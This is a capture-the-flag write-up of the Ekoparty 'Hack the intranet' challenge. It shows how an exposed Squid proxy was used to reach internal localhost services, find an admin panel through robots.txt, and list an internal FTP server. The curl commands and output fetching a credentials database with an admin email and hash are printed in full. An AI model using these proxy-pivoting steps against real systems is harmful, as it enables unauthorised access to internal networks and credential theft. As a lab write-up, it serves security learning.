Description
Hack the intranet!Here is the flag
http://challs.ctf.site:10002
Resolution
Actually, the description is pretty short. So in order to better understand what we have to do, we tried to load the webpage.
Well well well, obvisously, It is a Squid proxy. Since we’re a bit lame, we didn’t realize at first that we just had to set the proxy in our browser, we tried some tests, like loading http://challs.ctf.site:10002/https://google.fr, http://challs.ctf.site:10002/https://127.0.0.1:3128 (this ip/port was in the response headers), but nothing worked. Only after these tests, we realized that the simplest way was to set up this URL as a proxy, just as shown below :
OK, now that we’ve got the good settings, what page can we load ? Let’s just try 127.0.0.1!
OHMYGOSH!!1 IT WORKED! WE’RE ON THE INTRANET!!1 We clearly see an “Admin Panel” link. Unfortunately, it leads to… nothing 🙁
How can we find the admin panel link ? Well, there is nothing interesting in the source code, but there is a way to get “hidden” links. Yep. robots.txt 🙂
So, we got the admin panel loaded, but what can we do with that? We tried classic stuff (well… Actually SQL injections and derivatives). But, as expected, it didn’t worked.
So, at this point, we were stuck, for a few hours actually before finding an idea: Squid is a proxy, which handles HTTP. Maybe it could handle more that only http ? Maybe it could handle, for example, FTP ? As we’re fucking h4><0rs,We've tried it via CLI, because it's soooooo cool !
[code language="bash"]
pi@raspberrypi ~ $ curl -vk -x http://challs.ctf.site:10002/ ftp://127.0.0.1:21
* About to connect() to proxy challs.ctf.site port 10002 (#0)
* Trying 52.20.148.242...
* connected
* Connected to challs.ctf.site (52.20.148.242) port 10002 (#0)
> GET ftp://127.0.0.1:21 HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 127.0.0.1:21
> Accept: */*
> Proxy-Connection: Keep-Alive
<
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.0, assume close after body
> HTTP/1.0 200 Gatewaying
> Server: squid/3.1.20
> Mime-Version: 1.0
> Date: Wed, 16 Sep 2015 18:44:40 GMT
> Content-Type: text/html
> X-Cache: MISS from localhost
> X-Cache-Lookup: MISS from localhost:3128
> Via: 1.0 localhost (squid/3.1.20)
> Connection: close
>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- HTML listing generated by Squid 3.1.20 -->
<!-- Wed, 16 Sep 2015 18:44:40 GMT -->
<HTML><HEAD><TITLE>
FTP Directory: ftp://127.0.0.1/
</TITLE>
<STYLE type="text/css"><!--BODY{background-color:#ffffff;font-family:verdana,sans-serif}--></STYLE>
</HEAD><BODY>
<H2>
FTP Directory: <A HREF="/">ftp://127.0.0.1</A>/</H2>
<PRE>
<A HREF="%2e%2e/"><IMG border="0" SRC="/squid-internal-static/icons/anthony-dirup.gif" ALT="[DIRUP]"></A> <A HREF="%2e%2e/">Parent Directory</A> (<A HREF="%2f/">Root Directory</A>)
<A HREF="backups/"><IMG border="0" SRC="/squid-internal-static/icons/anthony-dir.gif" ALT="[DIR] "></A> <A HREF="backups/">backups</A>. . . . . . . . . . . . . Aug 24 23:05
</PRE>
<HR noshade size="1px">
<ADDRESS>
Generated Wed, 16 Sep 2015 18:44:40 GMT by localhost (squid/3.1.20)
</ADDRESS></BODY></HTML>
* nread <= 0, server closed connection, bailing
* Closing connection #0
[/code]
WHAT WHAT WHAT!? Is it working? Yeahhhhh! By following the directories, we found a file named "credentials.db". Hmmm seems interesting, doesn't it ? Again, we used CLI to get the file via curl, and...
[code language="bash"]
pi@raspberrypi ~ $ curl -vk -x http://challs.ctf.site:10002/ ftp://127.0.0.1:21/backups/credentials.db
* About to connect() to proxy challs.ctf.site port 10002 (#0)
* Trying 52.20.148.242...
* connected
* Connected to challs.ctf.site (52.20.148.242) port 10002 (#0)
> GET ftp://127.0.0.1:21/backups/credentials.db HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 127.0.0.1:21
> Accept: */*
> Proxy-Connection: Keep-Alive
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.0, assume close after body
< HTTP/1.0 200 Gatewaying
< Server: squid/3.1.20
< Mime-Version: 1.0
< Date: Wed, 16 Sep 2015 18:45:17 GMT
< Content-Type: text/plain
< Content-Length: 2048
< Last-Modified: Mon, 24 Aug 2015 23:05:46 GMT
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.20)
* HTTP/1.0 connection set to keep alive!
< Connection: keep-alive
<
��;�tabl;Msuperadmin@intranet.net31b54c2ac1ccb15b9896966c3fac5c8e* Connection #0 to host challs.ctf.site left intact
* Closing connection #0
[/code]
OK, seems cool 🙂 ! It looks like credentials, no ? By using Google, we found a the cleartext of the hash (I guess the Eko Party team created this pastebin earlier, specially for the CTF), which is pretty cool !
Actually, we also tried to open the file, it’s an encrypted sqlite database, but as we had a login/hash, we didn’t really tried to open it.
So, now that we’ve got credentials, we could use them on the admin panel, in order to see if it can work.
Annnnd, Done 😀
Flag : EKO{Squid_is_also_FTP_Proxy}
hello, 0x90r00t, nice write ups.
btw, i wondered how you guys know about this ctf?. me and my friends check ctftime.org but this ctf ‘s infromation never posted there. thats why we couldnt participated this ctf. sorry my bad english.
Hello rea and thanks!
I think it was probably known through word of mouth then 🙂